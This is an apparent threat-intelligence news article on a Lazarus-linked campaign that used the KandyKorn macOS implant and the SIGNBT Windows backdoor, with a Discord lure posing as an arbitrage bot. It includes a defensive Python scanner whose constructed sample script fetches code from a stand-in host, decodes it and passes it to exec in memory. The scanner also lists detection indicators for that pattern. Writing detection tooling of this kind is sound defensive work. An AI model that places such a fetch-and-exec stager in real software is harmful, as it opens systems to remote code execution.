New North Korean Hacking Group Attacks
Researchers have discovered a hacking campaign attributed to a group reportedly linked to North Korea. The campaign appears to be part of North Korea's efforts to evade international sanctions, with cryptocurrency holdings as the probable target. Cybersecurity firm Elastic Security Labs has noted the overlap between this campaign's tactics and techniques and those of Lazarus, a well-known North Korean state-sponsored group. The identity of the victims has not been disclosed, but they are reported to work for a cryptocurrency exchange.
Use of New macOS and Windows Malware by Lazarus Group
Notably, this campaign targets devices running macOS, predominantly the Apple laptops and desktops of blockchain engineers. The attackers used an advanced implant referred to as KandyKorn, which can access and extract data from the victim's computer, upload and execute additional payloads, and kill processes. The implant includes functionality designed to avoid detection, adding to its potency. The Lazarus group has also used the SIGNBT and LPEClient malware strains in the past to collect information about victims' devices and steal their login details.
Targeting Blockchain Engineers at a Cryptocurrency Exchange
The prime targets of this campaign are believed to be blockchain engineers employed by a cryptocurrency exchange. Elastic Security Labs has withheld the affected exchange's name as a precaution. The attackers' interest in this particular target suggests an objective of stealing cryptocurrency as a means of bypassing the international sanctions North Korea currently faces.
Impersonation of Blockchain Community Members on Public Discord Channel
In an attempt to gain the trust of their targets, the attackers impersonated members of the blockchain community on a public Discord server. Through this platform they delivered a Python application posing as a cryptocurrency arbitrage bot to unsuspecting victims. A genuine arbitrage bot automatically buys and sells cryptocurrency to profit from price differences between exchanges, which makes it a plausible lure for this audience.
Use of Python Application for Initial Access and Loading of Binaries in Memory
One aspect that stood out in this campaign was the method used to gain initial access. The Python application posing as an arbitrage bot served as a stager: once run by the victim, it fetched further payloads and loaded them directly into memory rather than installing them as conventional binaries on disk. This method is atypical for macOS intrusions and illustrates the attackers' sophistication and inventiveness.
Introduction and Operation of KandyKorn macOS Malware
KandyKorn, a remote access trojan (RAT) attributed to the North Korea-linked Lazarus Group, is a novel and potent threat. It stands out for its ability to establish encrypted command-and-control (C2) communications, enumerate the system, upload and execute additional malicious payloads, and exfiltrate data, compressing it to remain under the radar. Dating back to at least April 2023, KandyKorn remains an active threat whose tools and techniques are still under development, according to Elastic Security Labs researchers.
Execution of KandyKorn Malware on Target Machine
KandyKorn is distributed through a Python application posing as an arbitrage bot. Once the bot is run on the target machine, it retrieves further Python files that execute the SUGARLOADER second-stage payload, and SUGARLOADER in turn fetches and executes KandyKorn. Splitting the intrusion into stages like this reduces the number of endpoint and network artifacts any single stage leaves behind, limiting the chance of discovery.
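The fetch-and-execute pattern described in the two passages above (a Python lure that retrieves more code and runs it from memory instead of writing a binary) can be triaged statically before a script is ever run. The following scanner is an added example written for this article; it is not code from Elastic Security Labs or from the campaign. The two scripts it inspects are constructed for illustration, and the module and function names it looks for (urllib, requests, socket, exec, compile, b64decode, decompress, and so on) are an assumption about what such a stager typically uses.

```python
import ast

# Constructed sample scripts for the scanner (not real malware). The first
# follows the stager pattern described above: fetch remote content, decode it,
# and hand it to exec/compile so the payload never exists as a file on disk.
STAGER_LIKE = '''
import urllib.request, base64, zlib
def update():
    data = urllib.request.urlopen("http://example.invalid/bot/update").read()
    code = zlib.decompress(base64.b64decode(data))
    exec(compile(code, "<memory>", "exec"), globals())
update()
'''

# A benign bot that also talks to the network but only parses JSON.
BENIGN = '''
import urllib.request, json
def prices():
    raw = urllib.request.urlopen("http://example.invalid/ticker").read()
    return json.loads(raw)
print(prices())
'''

# Assumed indicator sets; extend them for the libraries in your own codebase.
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
NETWORK_ROOTS = {"urllib", "requests", "socket", "http", "httpx", "aiohttp"}
DECODERS = {"b64decode", "decompress", "unhexlify", "a85decode", "b32decode"}


def _called_name(call):
    """Name of the function being called, for both exec(...) and zlib.decompress(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_source(src, filename="<script>"):
    """Statically triage one Python script for the fetch-decode-exec stager pattern.

    Returns the network modules imported, the dynamic-execution calls found as
    (name, line) pairs, the decoders used, and a verdict.
    """
    tree = ast.parse(src, filename)
    network, dynamic_exec, decoders = set(), [], set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_ROOTS:
                    network.add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_ROOTS:
                network.add(node.module)
        elif isinstance(node, ast.Call):
            name = _called_name(node)
            if name in DYNAMIC_EXEC:
                dynamic_exec.append((name, node.lineno))
            elif name in DECODERS:
                decoders.add(name)

    if network and dynamic_exec:
        verdict = "suspicious"   # remote bytes have a path into exec: stager-like
    elif dynamic_exec:
        verdict = "review"       # dynamic code, but no network source in this file
    else:
        verdict = "clean"
    return {
        "file": filename,
        "network": sorted(network),
        "dynamic_exec": dynamic_exec,
        "decoders": sorted(decoders),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, src in (("stager_like.py", STAGER_LIKE), ("benign_bot.py", BENIGN)):
        print(scan_source(src, name))
```

This is a triage heuristic, not a verdict: plugin systems and notebooks legitimately call exec, and a real stager can hide the names it uses behind getattr or string concatenation, so pair the static check with runtime telemetry such as a Python interpreter that opens a network connection and then spawns a new executable or maps an unsigned binary.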
Malware Capabilities: Monitor, Interact, and Avoid Detection
KandyKorn qualifies as an advanced implant because of its extensive capabilities for monitoring and interacting with the system and for evading detection. It can execute additional malware, terminate processes, and run arbitrary commands; combined with file enumeration and data exfiltration, these abilities make KandyKorn a formidable tool in the hands of an attacker.
Reflective Loading Used for Direct-Memory Form of Execution
The malware employs reflective loading, a technique in which a binary is mapped and executed directly from memory rather than being written to disk and launched as a file. Because no file is created, detection tools that rely on scanning files on disk may miss the payload. Reflective loading helps KandyKorn remain undetected while it operates on the system.
Command-and-Control Server Commands to Malware for Information Harvesting and System Control
After establishing communication, KandyKorn waits for commands from the command-and-control server rather than polling for them at intervals. This reduces the endpoint and network artifacts the implant generates, since there is no periodic beacon for monitoring tools to pick up. Depending on the commands received, the malware performs system enumeration, data exfiltration, and command execution as the attackers require. This responsiveness to the command-and-control server significantly increases KandyKorn's threat potential.
Additional Attacks and Malware Deployments
North Korean hackers are not restricted to the KandyKorn macOS malware. They have also launched sophisticated attacks against a variety of platforms, exploiting vulnerabilities in various software and systems.
Attacks on Users of a Security Software for Encrypted Web Communications
Besides advanced macOS malware, North Korean threat actors have also targeted users of security software designed for encrypted web communication. Attackers are using a widening range of delivery methods, exploiting the trust users place in secure communication channels to slip by unnoticed and gain access to sensitive information or systems.
Compromise of Software Vendor’s System Through Exploitation of Unpatched Vulnerabilities
Cybercriminals, including those tied to North Korea, often exploit unpatched vulnerabilities in software vendors' systems to infiltrate and compromise their targets. By this route they gain unauthorized access to otherwise protected systems, install malicious software, and steal valuable data. Companies are urged to implement robust cybersecurity measures and keep their systems current with the latest security patches to prevent such attacks.
Deployment of New Windows Backdoor Malware Called SIGNBT
Another significant threat from North Korean hackers is the deployment of a new Windows backdoor known as SIGNBT. This malware lets attackers take control of an infected system, execute commands remotely, install additional malware, and steal sensitive information. Like KandyKorn, SIGNBT demonstrates the increasing sophistication and advanced capabilities of the malware North Korean hackers use in their ongoing campaigns.
Detailed Functioning of SIGNBT Malware
SIGNBT is a powerful backdoor developed by North Korean hackers that lets them operate covertly while performing a broad range of malicious actions. Its functionality spans fingerprinting the system, maintaining full control over the victim's machine, and deploying additional payloads.
Fingerprinting of the System and Communication with C&C Server
SIGNBT starts by fingerprinting the infected machine, collecting essential information about the operating system, hardware configuration, installed software, and network details. This information is encrypted and sent to the attackers' command-and-control (C&C) server, which establishes the communication link between the compromised machine and the operators.
Server Command Execution Capability
After establishing the link with the C&C server, SIGNBT waits for subsequent commands. This server command execution capability lets the attackers control the infected machine remotely and perform a wide range of malicious activities, including uploading, downloading, and executing files, enumerating the system, and more.
Full Control Over Victim Machine and Information Theft
SIGNBT gives the attackers complete control over the victim's machine, making it a highly potent tool in the hands of the Lazarus group. Beyond executing arbitrary commands, the malware can steal sensitive data from the infected machine, leading to severe breaches of privacy and substantial potential financial loss.
Deployment of Additional Payloads in-Memory, Including LPEClient Malware and Credential Dumping Utilities
SIGNBT can also deploy additional payloads in memory, a technique that lets it evade many security measures that inspect files on disk. One such payload linked to SIGNBT is the LPEClient malware. The attackers additionally employ credential dumping utilities to steal login details from the victim's machine, further amplifying the potential harm of an attack.